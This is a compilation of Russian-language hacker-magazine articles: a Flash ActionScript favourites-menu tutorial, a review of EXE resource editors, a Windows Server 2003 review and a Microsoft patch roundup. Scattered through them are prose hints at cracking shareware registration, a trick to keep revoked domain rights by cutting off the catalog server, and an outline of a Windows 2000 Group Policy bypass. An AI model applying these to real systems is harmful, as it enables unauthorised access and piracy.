МО: В основном плагинами занимаются люди, которым небезразлична судьба Миранды. В основном они реализуют свои собственные идеи, хотя случается, что кодеру подбрасывает мысль один из юзеров в нашем форуме. К тому же многим сложно разработать свой проект мессенджера, а прикрутить к нашему свою фичу довольно просто :).

D: Что случилось с проектом скинов Лизард? Будут ли вообще скины под Миранду?

МО: Миранда находится в стадии бета-тестирования, поэтому автору плагина надо следить за изменениями API и переписывать части плагина при необходимости. Автор Лизарда на это забил, этот плаг стал жутко нестабильным и в итоге был удален с нашего сайта. Новый модуль поддержки скинов, возможно, появится, но это не в наших ближайших планах.

D: А что же в них? Может, плагин для сети Одиго?

МО: Добавление новых сетей - это наше основное направление. Поэтому, скорее всего, плагин для Одиго скоро появится. Пока же мы занимаемся совершенствованием ядра, что пройдет незаметно для юзеров. Зато кодеры оценят простоту создания новых клевых плагинов. А ближайшие релизы - новые качественные модули поддержки IRC и AIM.


Спецвыпуск Xakep, номер #029, стр. 029-096-1, ][-desktop - Любимчики

][-desktop - Любимчики

ilich (ilich@atrus.ru)

Спецвыпуск Xakep, номер #029, стр. 029-096-1

Ни за что не поверю, что пути ко всем тобой глубоко уважаемым местам в нете ты помнишь наизусть. Тем более я сомневаюсь, что тебя абсолютно не ломает каждый раз давить клаву, набивая урлы. Старик Билл был добрым чуваком, он для таких, как мы, сотворил "Избранное". Так пойдем же за прогрессом и обгоним его, сделав доступ к любимцам на свой лад, то есть как надо!

Чего хочу, то и творю

Индифферентность будет на твоем лице тогда, когда я выдам мысль: воплотить суть избранного на Рабочей поверхности того самого Билли. В принципе, на него достаточно было бы наверстать элементарную HTML-ку со всеми твоими ссылками, ведь изначально твой Active Рабочий стол обычный *.html. Но мы же с тобой не простые, а анимированные и, плюс к тому, векторные. Тут не обойтись без старого доброго Flash'a.

Для начала залезь в свойства флешки (меню Модификация / Видеофрагмент) и поставь там размеры 320 Х 768, в смысле высота больше. Далее ставим цвет фона светло-серым.

Начнем с рисования. Создай новый символ кнопки "B - Start". Рисуй там какую-нибудь маленькую штучку, которая всегда и везде заставляет мягко улыбнуться. Для кого-то это аськин цветочек, для кого-то - эмблема Windows, не суть важно. Главное, чтоб шириной это нечто было меньше 50px - будет удобнее и красивее. Еще позаботься, чтоб в кнопке присутствовали все четыре кадра. А работать она будет, как кнопочка "Избранное" в меню IE, - будет вызывать, собственно, меню "Избранное".

Выход из меню (сворачивание) сделаем посредством другой пимпы. Назовем ее "B - Close". В ней изобрази то, что неразрывно связанно с закрытием приложения - жирный крест. На разработку накладываются те же требования, что и у предыдущей кнопки, только ширина нужна ровно 20 px.

Следующий символ - кнопка прокрутки "B - Move". Она должна быть тонкой широкой полоской 300 на 10 пикселей фона с маленькой стрелкой, показывающей вверх или вниз - решай сам. Во всех кадрах, кроме первого, цвет фона кнопки сделай таким же, как цвет основного фона, а в первом кадре - чуть-чуть потемнее.

Символ номер раз на сегодня - кнопка "B - URL", в будущем используемая как пункт нашего избранного. Здесь тоже рисуется горизонтальный прямоугольничек (300 на 20). В левой части нарисуй хоть точку - типа указатель на элемент списка. Над остальным пространством прямоугольника тяни текстовое поле. Делай это поле динамическим, невыбираемым и с размером шрифта 12. В самом поле можешь написать что-нибудь важное для тебя :) и забыть - будет стерто скриптами. Для доступа скриптов надо дать полю название: "head". Цвет текста надо выбрать такой, чтобы он хорошо смотрелся как на светло-сером основном фоне, так и на более темном варианте в первом кадре. Кстати о кадрах, указатель списка и текстовое поле должны быть, по крайней мере, в первых трех кадрах кнопки, в одном длинном кадре.

Кодим

Так уж устроен наш жестокий мир, что абсолютное большинство благ Flash'a пятого в области ActionScript, применяемых для манипулирования объектами, применяется лишь только для мувиков. Это несколько омрачает жизнь (славься, MX! :)), но не прекращает ее. Все наши четыре кнопки необходимо засунуть в такие же наши четыре клипа: соответственно "C - Start", "C - Close", "C - Move" и "C - URL". Верхние левые углы кнопок в клипах должны быть в центре клипов. Теперь можно делать что угодно. Я все еще про нашу флешку :).


Спецвыпуск Xakep, номер #029, стр. 029-096-2, ][-desktop - Любимчики

][-desktop - Любимчики

ilich (ilich@atrus.ru)

Спецвыпуск Xakep, номер #029, стр. 029-096-2

А сделать надо следующее. Тащи на главную сцену эти четыре мувика по одной штуке, а клипа "C - Move" аж две, т.к. прокрутка должна быть в две стороны. Руководствуясь этим и юзая путь "Модификация / Трансформирование / Переворот по вертикали", переверни одну из стрелок так, чтобы она смотрела в сторону, отличную от второй кнопки. Указку вверх тащи к координатам X=330; Y=0 и называй ее "arr_up". Ту, что вниз, - к X=330; Y=758; имя - "arr_down". Клип "С - Start" ставь в 330;10 и называй "starter", мувик "C - Close" - в 330;0, имя - "closer", а "C - URL" в любое место, отличное от главной рабочей области, и зови "proto", соответственно.

Заходи теперь в редактирование клипа "C - Start" и жми правой половиной мыши на кнопке "B - Start", в меню выбирай Actions и пиши:

on(press){

_root.proto.loadVariables("fav.txt");

_x=_root._width+10;

_root.closer._x=300

}

При нажатии на сие в клип "proto" загрузятся переменные из текстовика "fav.txt", данный клип унесется на 10px на экран, и взамен ему оттуда появится мувик "closer".

Текстовик должен быть следующего формата. Переменным "l1", "l2"... присваиваются урлы выбранных тобой страниц, переменным "t1", "t2"... даются значения красивых названий для соответствующих страниц (в том смысле, что адрес "http://www.pervertpictures.com/gal/ludmila2/icg.htm" неплохо было бы в плане отображения на Рабочем столе заменить на "хе-хе прикольная тетка"). Переменные в текстовиках разделяются символом "&".

Для кнопки "B - URL" в клипе "closer" набивай:

on (press) {

getURL(link,"_blank");

}

И появится из этой кнопки при нажатии на экране эксплорер, идущий на... куда говорит переменная "link", в новом окне.

Для самого клипа "closer" на главной сцене вставляй скрипт:

onClipEvent(data){

i=1;

while ((String(this["l"+i])!="")and(i<=37)) {

_root.proto.duplicateMovieClip("pro"+i,i);

_root["pro"+i]._x=0;

_root["pro"+i]._y=10+(_root.i-1)*20;

_root["pro"+i].link=this["l"+i];

if (String(this["t"+i])!="") {

_root["pro"+i].head=this["t"+i];

}else{

_root["pro"+i].head=this["l"+i];

}

i++;

}

_root.first=1;

if (String(this["l"+(i+1)])!="") {

_root.arr_up._x=0;

_root.arr_down._x=0;

}

}

По окончании загрузки переменных в клип делается некоторое количество его копий, по одной на каждую загруженную не пустую переменную "ln" в пределах 37, ибо между кнопками прокрутки влезает лишь 37 клипов высотой по 20px каждый. Если ссылок меньше, чем 37, будет лишь столько кнопок, сколько надо, а кнопок прокрутки не будет. Значение этих переменных присваивается переменной "link", т.е. той самой переменой урла в кнопке "B - URL" и переменной "head" а-ля надпись на кнопке. В случае отсутствия переменной надписи в заголовок кнопки подставляется само значение ссылки. После создания копий переменной "first" основной киноленты дается значение 1 (типа первый элемент списка - ссылка номер 1 - понадобится для скрипта в прокрутке) и, если есть следующая за последней переменной ссылка, выносятся пред твои светлы очи кнопки прокрутки.


Спецвыпуск Xakep, номер #029, стр. 029-096-3, ][-desktop - Любимчики

][-desktop - Любимчики

ilich (ilich@atrus.ru)

Спецвыпуск Xakep, номер #029, стр. 029-096-3

Прокрутка

В этих самых прокрутках для кнопок надо вставить:

on (press) {

if ((_y==0)and(_root.first>1)){

for (j=37;j>=2;j--){

_root["pro"+j].head=_root["pro"+(j-1)].head;

_root["pro"+j].link=_root["pro"+(j-1)].link;

}

if (String(_root.proto["t"+(_root.first-1)])!="") {

_root.pro1.head=_root.proto["t"+(_root.first-1)]

} else {

_root.pro1.head=_root.proto["l"+(_root.first-1)]

}

_root.pro1.link=_root.proto["l"+(_root.first-1)]

_root.first--;

}else if ((_y==768)and(String(_root.proto["l"+(_root.first+37)])!="")) {

for (j=1;j<=36;j++){

_root["pro"+j].head=_root["pro"+(j+1)].head;

_root["pro"+j].link=_root["pro"+(j+1)].link;

}

if (String(_root.proto["t"+(_root.first+37)])!="") {

_root.pro37.head=_root.proto["t"+(_root.first+37)]

} else {

_root.pro37.head=_root.proto["l"+(_root.first+37)]

}

_root.pro37.link=_root.proto["l"+(_root.first+37)]

_root.first++;

}

}

Пожалуй, это наиболее трудный код нынче. Так как пимпа для прокрутки у нас всего одна, а вставляться она будет в два разных по функциям места, то, определив ее положение и законность (в плане здравого смысла) операции, движем значения ключевых переменных по клипам в нужную сторону.

Последняя скриптуемая кнопка - кнопка в форме крестика. Для "B - Close" в клипе "closer" пиши:

on (press) {

for(j=1;j<=_root.proto.i;j++){

_root["pro"+j].removeMovieClip();

}

_x=_root._width+10;

_root.starter._x=270;

_root.arr_up._x=_root._width+10;

_root.arr_down._x=_root._width+10;

}

Заметаем следы: убиваем все созданные тобой копии клипа "proto", выносим на экран кнопку начала сеанса и прячем кнопки прокрутки, если надо, и самих себя. Все путем.

Используй и наслаждайся.

И да пребудет с тобой Великий Flash!


Спецвыпуск Xakep, номер #029, стр. 029-098-1, РАЗРЫВАЯ ПЛОТЬ - копошимся внутри ЕХЕ'шников

РАЗРЫВАЯ ПЛОТЬ - копошимся внутри ЕХЕ'шников

Андрей "Дронич" Михайлюк

Спецвыпуск Xakep, номер #029, стр. 029-098-1

(dronich@real.xakep.ru)

Не, я ни фига не орк, как ты мог сообразить из названия. Я всего лишь человек, которого много раз на дню достают письмами типа: "Дронич, как ты сделал в меню "Дуст" вместо "Пуск", скажи, пожалуйста, где это в реестре?" :). Так что в очередной раз затеваю я ликбез для самых маленьких, плавно переходящий в обзор для вполне больших. На повестке дня сегодня екзехи - с чем их кушать и как их безболезненно моддить.

WE'RE THE SOFT-HUNTERS!

Первое, о чем я обязан попросить тебя - ни в коем случае не лезь внутрь прог, чтобы сменить копирайт на "Хукед бай Жама-Хакер". Это мало того что незаконно, да еще и неспортивно, неправильно и не по-пацански :). Так что считаем, что потроха исполняемых файлов и DLL'ок мы ворошим только для того, чтобы:

а) разнообразить наскучивший интерфейс Винды и других популярных прог

Развлечение это из серии "давайте надругаемся над бабушкой", но иногда безумно затягивает. Заменять все подряд не стоит, а вот привести вещи к логическому завершению - это можно. Например, если у тебя, как и у меня, вместо корзины живет симпатичный унитаз, то надпись "Очистить корзину" просто-напросто компрометирует тебя в глазах продвинутых друзей. Вот то ли дело "Спустить воду" или "Слить дерьмо" :).

б) выдрать из проги понравившийся ресурс

Случалось так, что в какой-нибудь голимой и ненужной софтине ты напарывался на клевую авишку с танцующими гопака слониками? Если случалось, то наверно долго напрягала мысль - снести прогу со слониками и потерять их насовсем или любоваться на них, но терпеть эту муть. Хотя можно просто вырезать и сохранить :). Я, например, без зазрения совести выковыривал интересные ролики для внедрения в свои лабы по программированию (где ты, первый курс, когда душа хотела учиться - прим. гипоталамуса). А вот те же иконки интереснее выдирать специализированными прогами (типа IconS, http://nmsf.sscc.ru/neuro/). Но у настоящего хацкера инструмент должен быть универсальным :).

в) обрезать баннеры / уменьшить кнопки / поменять дефолты

Самое практичное применение процесса вскрытия - изменять параметры элементов интерфейса. Сделать побольше кнопу, которую "этот идиот программер" как бы специально уменьшил до 2х2 пикселей. Оторвать кусок окна с баннером и не любоваться им никогда (хотя для всех популярных прог, показывающих баннеры, есть готовые патчи, сделанные такими же, как ты :)). В конце концов - заставить понимать по-русски старые импортные проги (меня в свое время бесил DesignIdef, не признающий русских шрифтов в интерфейсе, - пришлось вылечить :)).

г) русифицировать упрямый софт

Практически подвид прошлого способа - только менять надо совсем все. Это сейчас все кодеры стараются замутить к своему софту языковые модули в виде простых текстовиков, а вот раньше софт без перевода был проблемой. Фиглиш, конечно, знать надо, иначе ты лишаешься многих удовольствий - от просмотра забугорных сайтов с эксклюзивной инфой до наслаждения фильмами без перевода :). Но если тебе проще потусоваться полчасика со словарем и сделать софт своей мечты русским - милости просим, хлеб соль энд соу он :).


Спецвыпуск Xakep, номер #029, стр. 029-098-2, РАЗРЫВАЯ ПЛОТЬ - копошимся внутри ЕХЕ'шников

РАЗРЫВАЯ ПЛОТЬ - копошимся внутри ЕХЕ'шников

Андрей "Дронич" Михайлюк

Спецвыпуск Xakep, номер #029, стр. 029-098-2

На этой приятной букве Г мы закончим причины и перейдем к следствиям. Вернее, к возможным последствиям твоих художеств. Но сначала - прозекторская практика :).

ПОСМОТРИ, ЧТО ВНУТРИ

Чтобы не растеряться, лучше знать, что ты можешь найти во внутренностях файла, что можно взять себе, что можно поменять, а что можно только с придыханием потрогать и положить на место. Ты можешь наткнуться на такие вещи, как: Bitmap (картиночки), Icon или Icon Group (иконочки), Menu (структуры и контент менюшек), Dialog (все окошки со всем содержимым), StringTable (сборище строк, применяемых в проге во всяких динамических сообщениях), Version Info (сюда можно по-честному дописать "профессиональный перевод Клявина А."). Все это можно менять и редактировать средствами прог, о которых мы поговорим. В принципе, никто не мешает тебе поменять все в разделах Accelerator или RCData, но за последствия никто не ручается, ибо эти части проги не просто важны, а жизненно важны. Я тебя предупредил ^_^.

ИНСТРУМЕНТАРИЙ КАСТРАТОРА

Прог, копающих екзехи и дээлэлки, в наше время развелось больше, чем кодеров на VB среди хакерской элиты :). Выбор невелик, но выбирать придется. Для меня наиболее ценны четыре штуки, все они были попробованы в действии на моих бедных файлах, от которых остались рога да ноги :).

eXeScope

Сказал бы, что эта прога ассоциируется у меня со швейцарским ножом - есть много фич, все под рукой, все удобно. Но настоящих молотка и стамески не заменит :). Открывать умеет не только приложения и библиотеки, но и куски "Панели управления" (cpl, если кто не знает), что выглядит весьма солидно. Редактирование строк просто до безобразия (обычный Edit), а вот для диалогов, окон и менюшек встроены очень приятные средства силовой правки :). Вся эта бня, как выражается один мой товарищ, отображается в виде деревца; таким образом вложенность меню и элементов окон показывается вполне наглядно. Очень жалко только, что поиск по этим красивостям не работает. То есть если ты хочешь заменить слово "попа", а оно сохранено не в СтрингТейблах, а в меню, искать ты его будешь ручками :(. Обидно, когда меню с десяток... Радует же то, что всегда в наличии окошки для задания координат, выпадающие списки и галочки с типами объектов (например, сделать плоские кнопки в старой Опере было до боли легко). И заметь, что во время редактирования непосредственно содержимого окон ты можешь вызвать визуальный редактор диалогов (кнопка с рамкой и желтой рукой китайца). Это есть большая приятность, ибо таскать кнопки мышкой удобнее, чем высчитывать координаты. Замена ресурсов проводится простым нажатием кнопочки "Import", надо только позаботиться о соответствии типов заменяемого ресурса (не пытайся согнуть ложку... в смысле, запихать в иконку картинку и наоборот). Добротно и по-нашему. Шароварка, но это не мешает. Must have.

ResHacker

А вот эта прога все пытается сместить eXeScope с моего компа :). Уж очень она мне нравится - с одной стороны, все сделано менее кустарно и куда более стильно и эргономично, а с другой, софтина смотрится еще профессиональней :). Все ресурсы представлены в виде универсального кода на С (известен как RC), превьюхи картинок и иконок выпадают автоматом, то же касается и диалогов с менюхами. Визуальное редактирование размеров, координат и текста, естественно, предусмотрено, причем на очень высоком уровне. Если в окошке визуального редактирования выбрать жертву и задействовать пункт "Edit Resource" из контекстного меню, покажется симпатичное окно свойств объекта (почти как в среде разработки типа Delphi или CPPBuilder). А маньяки могут спокойно все править ручками прямо в тексте. Кстати, поиск тут работает по всем ресурсам, хотя иногда лажает (это связано с тем, что многие слова содержат амперсанд - знак "&", показывающий винде, что следующий символ будет подчеркнут и использован в качестве шортката для быстрого перехода к строке меню). Импорт/экспорт на уровне, и тот и другой скрыты в меню "Action". В общем, снова must have. И не забудь включить "Show Dialog", Кулибин :).


Спецвыпуск Xakep, номер #029, стр. 029-098-3, РАЗРЫВАЯ ПЛОТЬ - копошимся внутри ЕХЕ'шников

РАЗРЫВАЯ ПЛОТЬ - копошимся внутри ЕХЕ'шников

Андрей "Дронич" Михайлюк

Спецвыпуск Xakep, номер #029, стр. 029-098-3

Restorator

Карамба! Этот универсальный комплекс для софтварного моддера был первым, кто предложил сохранять результаты изменений в виде патча :). То есть твое рожденное в муках творение на тему очередной проги вполне может пойти по рукам. Особенно это касается русификаторов и баннерозаменителей. Из других полезностей стоит отметить только систему просмотра ресурсов (можно выбрать, смотреть текстом, RC-кодом или в хексах), редактировать же придется чисто в кодах - визуального едита не предусмотрено :). Хотя окошко с окошком внутри :) все равно на экране маячит - чисто для ознакомления с тем ужасом, который ты пытаешься сотворить :). Больше весомых плюсов/минусов у Ресторатора нет, все как у всех. Я держу его только ради патчей, и то кряканную версию (шаровара патчей не делает, вот уж западло так западло :)).

PE Explorer

Эта софтварь тоже живет у меня на винте, но немного по другой причине. Да, она тоже умеет потрошить исполняемые файлы, но не дает ничего заменить. Зато выдает хексовые адреса всех ресурсов. Спросишь, на какого мне это надо? На большого и толстого :). Узнав адрес, по которому живет кнопочка "Register", можно запросто отловить ее обработчик. А там и до алгоритма недалеко. Заметь, что в состав Эксплорера включен отличный дизассемблерный модуль. Именно из-за него я забил на W32dasm, который до этого верно служил мне при расшароваривании шаровар. Так что профикам, для которых хексы понятнее RC (и уж тем более слюнявых окошек), рекомендуется как must have.

И ВЫМОЙ РУКИ!

Надеюсь, профи не зазевали, а ньюби напряглись не сильно :). Дисклаймерно предупреждаю: не ковыряй и не тереби что-то непонятное, пользы от этого не будет. Бэкапься дважды - один файл сохраняй как нетленную копию, второй - для правки, им ты потом заменишь старый экзешник. Предохраняйся, остерегайся, но не трусь. И вымой руки, мафака :).


Спецвыпуск Xakep, номер #029, стр. 029-100-1, ОСЬ НЕ ДЛЯ ВСЕХ - Microsoft Windows Server 2003

ОСЬ НЕ ДЛЯ ВСЕХ - Microsoft Windows Server 2003

Андрей "Дронич" Михайлюк

Спецвыпуск Xakep, номер #029, стр. 029-100-1

(dronich@real.xakep.ru)

Пока в Инете идет шумиха по поводу просочившихся данных о новой операционке от MS - LongHorn - парни в черных костюмах с белыми воротничками по полной мастерят новую серверную ось. И хоть официально она выйдет только к лету, нам удалось раздобыть немножко эксклюзивной инфы для тебя, а также самим попробовать на зуб MS Windows Server 2003 RC2 (второй кандидат на релиз).

МЫ С ПРИЯТЕЛЕМ ВДВОЕМ

Даже если ты первый раз в жизни слышишь о MSWS, из названия понятно, что ось это явно не для одинокого диалапного компа на задворках цивилизации :). И даже не для двух :). В наш век паутинообразных локальных сетей и длинного прозрачного оптоволокна сервера приходят почти в каждый дом. Вот примерно на такую мурь мы и должны по идее незамедлительно повестись :). А фигли нам, бобрам? :).

На самом деле история серверных осей от MS началась еще с первых версий NT. Расцвет их пришелся на пятую версию, в узких кругах известную как 2k :). На ней, собственно, и держится приличный кусок всемирной паутинки. Но, как известно, шило в одном месте и недостаток денежных средств в другом заставляют Майкрософт изощренно заботиться о пользователях :). Поэтому, сделав акцент на повышении безопасности "без ущерба функциональности", дядьки выпустили свежую версию с апгрейднутым движком и новыми компонентами.

ЗАМЕЧАТЕЛЬНО ЖИВЕМ

Начать стоит с того, что новый Server совсем необязательно использовать крутым хостерам и вебмастерам. Его можно с чистой совестью ставить на локальный комп (правда, подключенный к сети, иначе теряется весь смысл) и юзать вместо того же ХР, благо различия между ними в визуальном и настроечном плане практически незаметны. А если ты девелопишь под дот-нет или просто хочешь стать спецом в новомодной технологии - Server порадует тебя встроенным runtime'ом для .NET-приложений.

Новая файловая система хоть и осталась старой доброй NTFS'кой, но приобрела необходимые для веба (или просто для продвинутого юзера) фичи. Первая из них - фоновое снятие копий с папок раз в N единиц измерения времени. Назвать это полноценным "откатом" нельзя, но вот вернуться во вчера :) можно без применения сторонних или MS-овских прог. Для этого в свойствах папки или файла достаточно выбрать дату последнего автобэкапа. Фича приятная, так как места эти автосейвы по-любому занимают меньше, чем сейвы, сделанные любыми прогами. Ведь это уровень фаловой системы, чувак :).

Вторая приятность - это новенькая дефрагментация. Как всегда, она была лицензирована у третьих фирм, но работает вполне прилично и отличается выгодными преимуществами. К примеру, для системы не составит труда дефрагментировать MFT даже тогда, когда ты вовсю гамаешь в контру :). Ты ведь гамаешь в контру, я угадал? :). Так вот, новая фишка в том, что обязательной остановки системы для переразметки фаловой таблицы теперь не требуется. Комп можно не только не перезагружать, но и вообще не отключать. Настоящая мечта гика.

Еще из новинок мне понравилась новая услуга восстановления компа с нуля. То есть если в момент Х, когда у тебя ВСЕ (винт, мать, проц, мышь) накрылось кремлевской звездой, на полочке пылилась стопка болванок, закатанных с применением системы автоматического восстановления; через полчаса ты уже будешь созерцать любимые ярлычки на фоне любимых сисек десктопа. Как мы мечтали о таком году этак в 1997-ом...


Спецвыпуск Xakep, номер #029, стр. 029-100-2, ОСЬ НЕ ДЛЯ ВСЕХ - Microsoft Windows Server 2003

ОСЬ НЕ ДЛЯ ВСЕХ - Microsoft Windows Server 2003

Андрей "Дронич" Михайлюк

Спецвыпуск Xakep, номер #029, стр. 029-100-2

УГАДАЙТЕ, ЧТО ЗА ХРЕН?

Но снова к делу, ось-то вроде как серверная. Одним из козырей, который Гейтс вовремя достал из рукава, оказалась скорость. На достаточно солидной машине (что-то вроде восьмипневого монстра с RAID'ом и двумя гигами памяти на борту) и файловый, и веб-сервера из стандартного набора работают как минимум вдвое быстрей старика винтукея. То есть опять работает система "второй линеечки". Как, ты не знаешь, что такое вторая линеечка? Это когда вместе с диском ХР ты покупаешь еще 256 метров памяти и получаешь зверскую производительность, роняющую в нокаут старика-винтукея. Не, про нокаут как-то нехорошо получилось :). Просто круче и быстрее, вот и все.

Самым важным достижением системы как сервера считается включенный в поставку пятый IIS. Мало того, что в нем теперь можно стартовать процессы с правами любого пользователя (напомню, что раньше процесс, запущенный под командованием IIS, имел неограниченные права, что выделяло нам большой простор для эксплойтинга), так он еще и выключен в дефолтовых настройках :). А правда, на фига тебе IIS? Ты сначала с виндой разберись :))).

В Server до кучи добавлена поддержка CLR (common language runtime), дабы кривые руки кодера гестбуки не роняли на хрен весь сайт. То есть от ошибки одного программера вся система стопудово не гикнется. Наверно :).

Поражает забота MS о тупых админах. Теперь все службы, которые можно было отключить по дефолту, отключили. А те, которые отключить никак не удавалось, просто ограничили в правах. В принципе, такой переход к закрытой политике ресурсов может только радовать. Взять хотя бы одну неприятную мелочь - вход юзера с пустым паролем возможен только локально. Вот тебе и гикнулись любимые шары :(.

Уж не знаю, связано ли это с бумом ворчокинга (кстати, недавно видел хитрых ребят с банкой и ноутом около родного института :), хорошо что у нас нет беспроводных сетей), но в Server внедрен новый протокол 802.1x, взломать шифр которого не так просто, как банальный WEP. Плюс к этому ключ нельзя перехватить даже во время аутентификации - протокол, по которому юзер эстеблишет соединение, тоже закодирован :(. Ну что за западло?

Никуда не делась и тенденция внедрять мастера всюду, куда их только можно внедрить. Мог ли ты подумать лет пять-шесть назад, что админ пусть небольшого, локального, но сервака будет конфигурить его при помощи "Configure Your Server Wizard"? Мне вот такое не могло присниться и в страшном сне. Однако мастера есть, они помогают прописать DNS, DHCP и AD, а заодно и выбрать роль сервера в сети. Может быть, для файл-серверов локальных сеток это не так уж и плохо...

Еще одна беда, свалившаяся на нашу голову, это встроенный механизм работы со смарт-картами. Смарт-карта сама по себе является врагом любого кулхацкера. Ну представь себе - хардварный пассворд, без которого учетная запись юзера просто не активируется. Об удаленном доступе нет и речи. И ладно бы это была защита типа сканера отпечатков пальцев, который сидит в системе как USB-устройство, а значит, может быть отключен. Ни фига, смарт-ридер интегрирован в мать, смарт-аутентификация интегрирована в систему, круг замкнулся вокруг запястий незадачливого хацкера. Даже обидно как-то...


Спецвыпуск Xakep, номер #029, стр. 029-100-3, ОСЬ НЕ ДЛЯ ВСЕХ - Microsoft Windows Server 2003

ОСЬ НЕ ДЛЯ ВСЕХ - Microsoft Windows Server 2003

Андрей "Дронич" Михайлюк

Спецвыпуск Xakep, номер #029, стр. 029-100-3

МОЙ ПРИЯТЕЛЬ - МАНЕКЕН

Но MS - всегда MS! Расстраиваться по поводу отсутствия багов пока рановато :). Расскажу тебе об одном баге, выявленным мною чисто эмпирическим путем во время конференции, посвященной выходу MSWS 2003 RC2. Обрисую оперативную обстановку - в новом Server'e появилась расширенная поддержка глобального каталога. То есть все профили юзеров хранятся на серваке, во время процедуры прилогинивания данные с этого сервака сливаются на твой комп, и тебя пускают инсайд. Дело в том, что раньше при падении сервака с глобальным каталогом никто не мог залогиниться, ибо доступных данных о правах пользователей в этот момент в сети не было. В 2003-ем же Server'e данные о юзере кэшируются на локальном серваке (или прямо на его компе) каждый раз после смены его прав. То есть если глобальный каталог умер, ты все равно сможешь залогиниться. Почуял подвох? Я тоже, поэтому решил сразу озадачить спеца из MS. Дождавшись, пока ребята из Upgrade'оподобных журналов зададут свои дежурные вопросы ("Правда ли, что новая система стала еще лучше?" - "Да, это так, новая система стала еще лучше!" :)), я поставил вопрос ребром (далее конспект разговора):

Dr: "Скажите, а в какой момент происходит обновление кэша с данными о пользователях, если их права менялись?"

MS: "В момент логина пользователя с новыми измененными правами."

Dr: "То есть если меня понизили в правах, а я банально выдернул сетевой шнур из компьютера с глобальным каталогом и залогинился, мои права останутся старыми?"

MS: "Э-э-э... (2 минуты молчания) В общем-то, да..."

Dr: "Спасибо" :).

Вот такой незамысловатый способ мести уволенных админов бывшим хозяевам был найден всего за пару минут... То ли еще будет...

И НАЗВАЛИ ЕГО "ТИТАНИКОМ"...

В целом система получилась как всегда - немного новых фич, немного новых багов, высокая скорость на хорошем железе и всеобщая интеграция как принцип. Мне кажется, что заиметь себе MSWS стоит обязательно, если ты тусуешь в локалке. Как юзер разницы с ХР ты не почувствуешь, а как админ - сможешь воспользоваться кучкой полезного барахлишка :). Так что жди официального выхода системы и заценяй. Авось найдешь свою любовь :).


Спецвыпуск Xakep, номер #029, стр. 029-102-1, UPDATE - полезности от Microsoft

UPDATE - полезности от Microsoft

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-102-1

(alex-sun@mtu.ru)

В Мелкософте либо забили на тех, кто юзает винду, сидя у себя дома, периодически подрубаясь к Инету на диалапе, либо устранили все возможные дырки. Зато появились обновления, которые нужны для администрирования локалок. Причиной этого явления может быть либо отсутствие дырок, встречающихся в домашних условиях, либо обилие писем от злобных админов, у которых то контроллер домена глючить начнет, то вообще сервак вырубится. Ну и в таком все роде. "Письма письмами, но ведь не получать же кучу спама каждый день! - подумали в Мелкософте. - А то ведь еще и Microsoft.com завалят" :). И пошли они исправлять серверные глюки... А домашним юзерам дали время разобраться в своей системе - освоить старые проги, разобраться с новыми, просто поиграть.

Q318593: Обновление системы безопасности (контроллер домена Windows 2000)

Контроллер домена Windows 2000 проверяет, кто входит в сеть, и дает добро на доступ. Групповая политика нужна для того, чтобы хранить и применять на деле установленные админом настройки для юзеров и групп юзеров - настройки рабочего стола, доступ к файлам, к прогам, к Инету. Когда юзер входит с писюка в домен, то считывается инфа, содержащаяся в политике групп, и используются указанные там настройки. По дефолту все эти настройки обновляются раз в полтора часа. В двухтысячных есть несколько способов считывания. При одном из таких считываний хацкер может заблокировать обновление настроек групповой политики, тем самым обломав тех юзеров, которые пытаются войти в сеть, но не могут это сделать по непонятной причине. А сам хацкер в это время будет иметь админские права. Хацкер может использовать дырку сначала залогинившись нормально, а потом открывая файлы групповой политики с исключительным доступом чтения. После следует второе залогинивание, при котором уже никакие указанные админом ограничения на хацкера не будут действовать, ибо настройки групповой политики не были обновлены! Попробуй после этого отследи, кто в сетке порнухи на несколько гигов накачал. А достанется за такое безобразие снова админу :(. Так что не надо ждать, пока умельцы доберутся до файлов групповой политики, а надо срочно устранить эту дырку. Благо, в Мелкософте о ней позаботились и выпустили заплатку. А скачать его можно отсюда: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=36844.

Проблема с групповой политикой имеет место быть только в win2k, правда с любым сервиспаком (SP 1-3). Так что всех остальных просьба не беспокоиться - найдутся еще и другие дырки.

Tools'ы от Мелкософта

Навряд ли кому дома понадобится ставить заплатки для контроллера домена, а админы во всяких конторах сами разберутся, что им патчить, а что нет. Укрепление безопасности виндов пока можно отложить до лучших времен, а пока лучше подумать о том, как можно держать систему в таком состоянии, чтобы возникало поменьше глюков с тем, что уже есть.

Утилитка для создания загрузочных дискет Win XP

Да, я не опечатался. И в Мелкософте тоже. Просто не все компы поддерживают загрузку с сидюка (хотя зачастую достаточно просто прошить Bios, если чего-то и не работает). С ее помощью делаются самые обычные загрузочные дискетки, о которых уже многие успели забыть. На флопик закатываются дрова к сидюку, которые загрузятся, если в bios'е сделать флопак первобутовым (1-st boot device). После чего можно будет и винду поставить. Правда, если захочешь поставить кому-то Windows XP Home Edition, то делай дискетку для Home Edition'а. Дискеты для Professiona'а и для Home'а отличаются и не подходят. Тут, конечно, ребята замудрили. Сделали бы как раньше - одна дискета для установки любой на то время виндовой оси (95, 98, Me). Для работы этой тулзы нужен Win XP Pro SP1, а брать ее можно отсюда: http://download.microsoft.com/download/whistler/Install/SP1/W98NT42KMeXP/RU/winxpsp1_ru_pro_bf.exe. Великовата она немного (чуть больше 4 метров), но если уж понадобится, то лучше не пожалеть Инета и вытащить.


Спецвыпуск Xakep, номер #029, стр. 029-102-2, UPDATE - полезности от Microsoft

UPDATE - полезности от Microsoft

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-102-2

Переставь софт вместе с Windows Installer Clean Up

Эта софтина создана в помощь всем желающим удалить инфу о прогах, которые оставляют за собой какой-то след (например, в реестре) даже после их деинсталляции. Чистить ручками - неблагодарное занятие, а то вдруг еще чего лишнее потрешь - тогда точно помучаешься. Правда, WICU сделан для вычищения различных упоминаний о том софте, который стал глючить, так что даже перестановка не помогает! WICU поможет в борьбе со многими прогами, но она бессильна против Windows Installer'а и WI-программ (например, двухтысячный офис, для полного удаления которого есть свой Cleaner).

